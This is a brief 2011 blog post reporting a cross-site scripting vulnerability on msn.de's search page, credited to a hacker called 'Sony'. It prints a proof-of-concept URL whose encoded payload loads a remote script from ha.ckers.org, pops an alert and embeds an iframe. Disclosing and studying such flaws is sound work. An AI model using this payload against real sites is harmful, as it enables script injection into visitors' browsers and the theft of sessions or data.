Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Home Msn.de vulnerable to XSS(cross site scripting)
Vulnerability Web Application Vulnerability XSS Vulnerability

Msn.de vulnerable to XSS(cross site scripting)

Thursday, December 15, 2011

A hacker named as "Sony" discovered a XSS vulnerability in MSN.de website that allows to run malicious javascripts in a website. The "search" page has the XSS vulnerability.

POC:
http://apps.msn.de/search#%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js%3E%3C/SCRIPT%3E%3Cscript%3Ealert%28%22by%20Sony%22%29%3C/script%3E%3Ciframe%20width=%22560%22%20height=%22315%22%20src=%22http://www.youtube.com/embed/_-QPvffO1gs%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E

[SOURCE]
Tags: Vulnerability Web Application Vulnerability XSS Vulnerability
Share it:

Vulnerability

Web Application Vulnerability

XSS Vulnerability